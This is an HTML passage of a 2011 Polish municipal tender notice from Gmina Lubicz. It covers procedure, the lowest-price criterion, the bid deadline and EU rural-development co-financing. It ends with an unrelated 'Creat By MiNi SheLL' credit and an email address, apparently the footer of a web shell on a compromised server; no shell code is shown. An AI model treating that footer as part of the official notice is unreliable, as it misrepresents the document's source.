<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zgodnie z projektem budowlanym i specyfikacją techniczną.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Lubicz Lubicz Dolny, ul. Toruńska 21, 87-162 Lubicz, Referat Promocji i Rozwoju.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2011 godzina 09:45, miejsce: Urząd Gminy Lubicz Lubicz Dolny, ul. Toruńska 21, 87-162 Lubicz, biuro podawcze- pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadania współfinansowane ze środków Unii Europejskiej w ramach działania Odnowa i rozwój wsi PROW 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com